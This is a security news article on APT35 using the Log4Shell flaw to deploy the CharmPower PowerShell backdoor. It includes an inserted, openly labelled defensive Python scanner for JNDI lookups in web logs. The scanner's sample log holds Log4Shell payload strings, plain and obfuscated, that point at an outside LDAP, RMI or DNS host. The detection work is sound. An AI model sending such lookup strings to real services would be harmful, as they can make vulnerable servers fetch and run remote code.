Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor

Iranian hackers are exploiting the Log4j vulnerability to deploy a PowerShell backdoor dubbed “CharmPower” for follow-on post-exploitation activity.

Researchers at Check Point said in a report, “The actor’s attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on the previous infrastructure, which made the attack easier to detect and attribute.”

According to Check Point, the attacks are linked to APT35, a group also tracked under names such as Charming Kitten, Phosphorus, and TA453, based on overlaps with toolsets previously identified as infrastructure used by the threat actor.

Log4Shell (CVE-2021-44228, CVSS score 10.0) is a critical security vulnerability in the popular Log4j logging library that can be exploited to execute arbitrary code remotely on affected systems.
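Because Log4Shell is triggered by a `${jndi:...}` lookup string landing in a logged field (a User-Agent header, for example), one of the first things a defender checks is web server logs for such lookups. The following scanner is an added example, not code from the article or from Check Point; it normalises the common lookup obfuscations (`${lower:...}`, `${upper:...}` and the `${...:-default}` syntax) the way the vulnerable resolver would before matching, so that disguised payloads are not missed. The log lines and the RFC 5737 documentation addresses in them are constructed for the example.

```python
"""Defensive scanner for Log4Shell (CVE-2021-44228) lookup strings in web logs.

Added example, not from the original article. It normalises the common
obfuscations of the ${jndi:...} lookup (${lower:...}, ${upper:...} and the
${...:-default} syntax) the way the vulnerable resolver would, then flags any
line that still contains a JNDI lookup. Addresses and log lines are constructed.
"""
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: no further braces inside.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A resolved JNDI lookup and the protocol it would reach out with.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve(m: "re.Match[str]") -> str:
    """Collapse one innermost lookup used for obfuscation; leave others alone."""
    expr = m.group(1)
    if ":-" in expr:                       # ${anything:-default} -> default
        return expr.rsplit(":-", 1)[1]
    kind, sep, arg = expr.partition(":")
    if sep and kind.lower() == "lower":    # ${lower:J} -> j
        return arg.lower()
    if sep and kind.lower() == "upper":    # ${upper:j} -> J
        return arg.upper()
    return m.group(0)                      # e.g. ${jndi:...}: keep it for detection


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly resolve inner lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def jndi_scheme(line: str) -> Optional[str]:
    """Return the JNDI protocol (ldap, rmi, dns, ...) if the line carries a lookup."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, scheme) for every line containing a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((n, scheme))
    return hits


# Constructed sample access log (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2022:09:13:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2022:09:13:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.7 - - [10/Jan/2022:09:13:46 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.10/x}"',
    '198.51.100.7 - - [10/Jan/2022:09:13:47 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/z}"',
    '198.51.100.7 - - [10/Jan/2022:09:13:48 +0000] "GET / HTTP/1.1" 200 512 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    for n, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme}")
```

Matching on the normalised string rather than on the raw `${jndi:` literal is the point: the third and fourth sample lines contain no such literal yet resolve to one. The last sample line shows that an ordinary lookup without `jndi` is not reported, which keeps the check from flagging every `${...}` that appears in a log. A hit is a reason to check whether the receiving application actually runs a vulnerable Log4j version and whether the host made the outbound LDAP, RMI or DNS connection the lookup requests.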

The widespread use of the Log4j library has created a vast pool of easily exploitable targets, and bad actors have seized the opportunity to stage a dizzying array of attacks since its public disclosure last month.

Earlier, Microsoft also pointed out APT35’s efforts to acquire and modify the Log4j exploit. The recent finding suggests the hacking group has leveraged the flaw to distribute a PowerShell implant capable of retrieving next-stage modules and exfiltrating data to a command-and-control (C2) server.

Additionally, CharmPower’s modules support a variety of intelligence-gathering functionality, including features to gather system information, list installed applications, take screenshots, enumerate running processes, execute commands sent from the C2 server, and clean up any traces left by these components.

Microsoft and the NHS earlier cautioned that internet-facing systems running VMware Horizon are being targeted to deploy web shells and a strain of ransomware called NightSky. Microsoft connected the latter to a China-based operator dubbed DEV-0401, which has also deployed LockFile, AtomSilo, and Rook ransomware in the past.

Microsoft mentioned in a blog post that Hafnium, another threat actor group operating out of China, has also been observed utilizing the vulnerability to attack virtualization infrastructure in order to extend its typical targeting.

The researchers concluded, “Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks.”
